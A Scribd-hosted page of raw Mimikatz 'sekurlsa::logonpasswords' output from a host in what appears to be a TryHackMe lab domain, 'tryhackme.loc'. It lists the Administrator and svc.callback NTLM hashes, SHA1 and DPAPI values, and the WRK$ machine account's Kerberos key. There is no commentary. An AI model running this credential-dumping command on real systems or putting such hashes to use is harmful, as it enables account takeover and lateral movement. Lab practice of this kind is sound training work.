0% found this document useful (0 votes)
138 views6 pages

Mimikatz # Sekurlsalogonpasswords

The document contains logon information extracted using Mimikatz, detailing various user sessions and their authentication details. It includes usernames, domains, NTLM hashes, and logon times for multiple accounts, primarily focusing on the 'Administrator' and 'svc.callback' accounts within the 'tryhackme.loc' domain. Additionally, it shows some sessions with null passwords and various authentication methods, including NTLM and Kerberos.

Uploaded by

silviagrandhome
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
138 views6 pages

Mimikatz # Sekurlsalogonpasswords

The document contains logon information extracted using Mimikatz, detailing various user sessions and their authentication details. It includes usernames, domains, NTLM hashes, and logon times for multiple accounts, primarily focusing on the 'Administrator' and 'svc.callback' accounts within the 'tryhackme.loc' domain. Additionally, it shows some sessions with null passwords and various authentication methods, including NTLM and Kerberos.

Uploaded by

silviagrandhome
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 6

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 4300545 (00000000:00419f01)


Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/06/2025 14:43:03
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : tryhackme.loc
* NTLM : 568a741b56c79622cc3f4c83720bf45e
tspkg :
wdigest :
* Username : Administrator
* Domain : tryhackme.loc
* Password : (null)
kerberos :
* Username : Administrator
* Domain : tryhackme.loc
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 4289584 (00000000:00417430)


Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/06/2025 14:41:34
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : tryhackme.loc
* NTLM : 568a741b56c79622cc3f4c83720bf45e
tspkg :
wdigest :
* Username : Administrator
* Domain : tryhackme.loc
* Password : (null)
kerberos :
* Username : Administrator
* Domain : tryhackme.loc
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 158815 (00000000:00026c5f)


Session : Interactive from 1
User Name : svc.callback
Domain : TRYHACKME
Logon Server : DC
Logon Time : 12/06/2025 11:14:26
SID : S-1-5-21-1966530601-3185510712-10604624-3121
msv :
[00000003] Primary
* Username : svc.callback
* Domain : TRYHACKME
* NTLM : 66338f1647cc6a33fd686cd20e7bb917
* SHA1 : 6d32727024552c5cd72aa6ce74d6cf227dcb5cce
* DPAPI : ee20d845c479c1fdce1dcdd82b284014
tspkg :
wdigest :
* Username : svc.callback
* Domain : TRYHACKME
* Password : (null)
kerberos :
* Username : svc.callback
* Domain : TRYHACKME.LOC
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 157697 (00000000:00026801)


Session : Interactive from 1
User Name : svc.callback
Domain : TRYHACKME
Logon Server : DC
Logon Time : 12/06/2025 11:14:26
SID : S-1-5-21-1966530601-3185510712-10604624-3121
msv :
[00000003] Primary
* Username : svc.callback
* Domain : TRYHACKME
* NTLM : 66338f1647cc6a33fd686cd20e7bb917
* SHA1 : 6d32727024552c5cd72aa6ce74d6cf227dcb5cce
* DPAPI : ee20d845c479c1fdce1dcdd82b284014
tspkg :
wdigest :
* Username : svc.callback
* Domain : TRYHACKME
* Password : (null)
kerberos :
* Username : svc.callback
* Domain : TRYHACKME.LOC
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 56037 (00000000:0000dae5)


Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 12/06/2025 11:14:04
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WRK$
* Domain : TRYHACKME
* NTLM : fda6a7aac2e80e256a9be0b0dbf15f13
* SHA1 : 97d43d5345b2c7ef018147d08c33ac4466bede8f
tspkg :
wdigest :
* Username : WRK$
* Domain : TRYHACKME
* Password : (null)
kerberos :
* Username : WRK$
* Domain : tryhackme.loc
* Password : cb c8 b0 20 42 f6 b5 42 5a 6c 33 aa ed df 6d 06 0f a7 92 9e e3
8f ff 9c 2b e6 fe c3 33 c3 b1 cf bf d3 35 1d 38 95 fb 03 97 3c 0b f8 56 2a fd ae ec
d9 22 07 82 3f 48 d5 ed 9b 71 c8 50 b1 ce f8 fd c0 7f f3 7d 6d 2f 63 36 e6 e1 b1 45
40 32 46 da 84 b5 b4 4b af 04 98 8e 4b e4 da 51 44 dd cc 24 3c 22 d1 5b 59 7a f3 04
e2 76 fa 8d fd 25 bf f1 67 46 a2 1d 12 2b f1 5e c4 09 80 2e 15 6f 2d 48 d5 2b ce b3
52 4d 4c 75 2c a8 29 a5 d4 dc 72 90 95 9e 99 53 d6 28 4f be 00 7b 8d 57 c2 bf 6f 61
7a f3 aa 2a da 08 6b 34 4f 4e 4a 90 20 67 84 dc e2 90 a9 cf 6c d8 a1 97 73 ff c9 93
df da 03 d6 71 a0 90 fc 92 dd 74 06 cd 26 f1 3c eb 1b da 7d e8 6b d2 3d 48 c3 c0 5e
47 76 f8 dd 3b b6 c5 7a ad 9c b6 a4 52 62 df 36 cd 89 ca 96 ab 4f ce
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)


Session : Service from 0
User Name : WRK$
Domain : TRYHACKME
Logon Server : (null)
Logon Time : 12/06/2025 11:14:02
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WRK$
* Domain : TRYHACKME
* NTLM : fda6a7aac2e80e256a9be0b0dbf15f13
* SHA1 : 97d43d5345b2c7ef018147d08c33ac4466bede8f
tspkg :
wdigest :
* Username : WRK$
* Domain : TRYHACKME
* Password : (null)
kerberos :
* Username : wrk$
* Domain : TRYHACKME.LOC
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 27084 (00000000:000069cc)


Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/06/2025 11:14:01
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : WRK$
* Domain : TRYHACKME
* NTLM : fda6a7aac2e80e256a9be0b0dbf15f13
* SHA1 : 97d43d5345b2c7ef018147d08c33ac4466bede8f
tspkg :
wdigest :
* Username : WRK$
* Domain : TRYHACKME
* Password : (null)
kerberos :
* Username : WRK$
* Domain : tryhackme.loc
* Password : cb c8 b0 20 42 f6 b5 42 5a 6c 33 aa ed df 6d 06 0f a7 92 9e e3
8f ff 9c 2b e6 fe c3 33 c3 b1 cf bf d3 35 1d 38 95 fb 03 97 3c 0b f8 56 2a fd ae ec
d9 22 07 82 3f 48 d5 ed 9b 71 c8 50 b1 ce f8 fd c0 7f f3 7d 6d 2f 63 36 e6 e1 b1 45
40 32 46 da 84 b5 b4 4b af 04 98 8e 4b e4 da 51 44 dd cc 24 3c 22 d1 5b 59 7a f3 04
e2 76 fa 8d fd 25 bf f1 67 46 a2 1d 12 2b f1 5e c4 09 80 2e 15 6f 2d 48 d5 2b ce b3
52 4d 4c 75 2c a8 29 a5 d4 dc 72 90 95 9e 99 53 d6 28 4f be 00 7b 8d 57 c2 bf 6f 61
7a f3 aa 2a da 08 6b 34 4f 4e 4a 90 20 67 84 dc e2 90 a9 cf 6c d8 a1 97 73 ff c9 93
df da 03 d6 71 a0 90 fc 92 dd 74 06 cd 26 f1 3c eb 1b da 7d e8 6b d2 3d 48 c3 c0 5e
47 76 f8 dd 3b b6 c5 7a ad 9c b6 a4 52 62 df 36 cd 89 ca 96 ab 4f ce
ssp :
credman :

Authentication Id : 0 ; 25942 (00000000:00006556)


Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 12/06/2025 11:13:58
SID :
msv :
[00000003] Primary
* Username : WRK$
* Domain : TRYHACKME
* NTLM : fda6a7aac2e80e256a9be0b0dbf15f13
* SHA1 : 97d43d5345b2c7ef018147d08c33ac4466bede8f
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)


Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/06/2025 11:14:04
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 56056 (00000000:0000daf8)


Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 12/06/2025 11:14:04
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WRK$
* Domain : TRYHACKME
* NTLM : fda6a7aac2e80e256a9be0b0dbf15f13
* SHA1 : 97d43d5345b2c7ef018147d08c33ac4466bede8f
tspkg :
wdigest :
* Username : WRK$
* Domain : TRYHACKME
* Password : (null)
kerberos :
* Username : WRK$
* Domain : tryhackme.loc
* Password : cb c8 b0 20 42 f6 b5 42 5a 6c 33 aa ed df 6d 06 0f a7 92 9e e3
8f ff 9c 2b e6 fe c3 33 c3 b1 cf bf d3 35 1d 38 95 fb 03 97 3c 0b f8 56 2a fd ae ec
d9 22 07 82 3f 48 d5 ed 9b 71 c8 50 b1 ce f8 fd c0 7f f3 7d 6d 2f 63 36 e6 e1 b1 45
40 32 46 da 84 b5 b4 4b af 04 98 8e 4b e4 da 51 44 dd cc 24 3c 22 d1 5b 59 7a f3 04
e2 76 fa 8d fd 25 bf f1 67 46 a2 1d 12 2b f1 5e c4 09 80 2e 15 6f 2d 48 d5 2b ce b3
52 4d 4c 75 2c a8 29 a5 d4 dc 72 90 95 9e 99 53 d6 28 4f be 00 7b 8d 57 c2 bf 6f 61
7a f3 aa 2a da 08 6b 34 4f 4e 4a 90 20 67 84 dc e2 90 a9 cf 6c d8 a1 97 73 ff c9 93
df da 03 d6 71 a0 90 fc 92 dd 74 06 cd 26 f1 3c eb 1b da 7d e8 6b d2 3d 48 c3 c0 5e
47 76 f8 dd 3b b6 c5 7a ad 9c b6 a4 52 62 df 36 cd 89 ca 96 ab 4f ce
ssp :
credman :

Authentication Id : 0 ; 26947 (00000000:00006943)


Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/06/2025 11:14:01
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : WRK$
* Domain : TRYHACKME
* NTLM : fda6a7aac2e80e256a9be0b0dbf15f13
* SHA1 : 97d43d5345b2c7ef018147d08c33ac4466bede8f
tspkg :
wdigest :
* Username : WRK$
* Domain : TRYHACKME
* Password : (null)
kerberos :
* Username : WRK$
* Domain : tryhackme.loc
* Password : cb c8 b0 20 42 f6 b5 42 5a 6c 33 aa ed df 6d 06 0f a7 92 9e e3
8f ff 9c 2b e6 fe c3 33 c3 b1 cf bf d3 35 1d 38 95 fb 03 97 3c 0b f8 56 2a fd ae ec
d9 22 07 82 3f 48 d5 ed 9b 71 c8 50 b1 ce f8 fd c0 7f f3 7d 6d 2f 63 36 e6 e1 b1 45
40 32 46 da 84 b5 b4 4b af 04 98 8e 4b e4 da 51 44 dd cc 24 3c 22 d1 5b 59 7a f3 04
e2 76 fa 8d fd 25 bf f1 67 46 a2 1d 12 2b f1 5e c4 09 80 2e 15 6f 2d 48 d5 2b ce b3
52 4d 4c 75 2c a8 29 a5 d4 dc 72 90 95 9e 99 53 d6 28 4f be 00 7b 8d 57 c2 bf 6f 61
7a f3 aa 2a da 08 6b 34 4f 4e 4a 90 20 67 84 dc e2 90 a9 cf 6c d8 a1 97 73 ff c9 93
df da 03 d6 71 a0 90 fc 92 dd 74 06 cd 26 f1 3c eb 1b da 7d e8 6b d2 3d 48 c3 c0 5e
47 76 f8 dd 3b b6 c5 7a ad 9c b6 a4 52 62 df 36 cd 89 ca 96 ab 4f ce
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)


Session : UndefinedLogonType from 0
User Name : WRK$
Domain : TRYHACKME
Logon Server : (null)
Logon Time : 12/06/2025 11:13:57
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WRK$
* Domain : TRYHACKME
* Password : (null)
kerberos :
* Username : wrk$
* Domain : TRYHACKME.LOC
* Password : (null)
ssp :
credman :

You might also like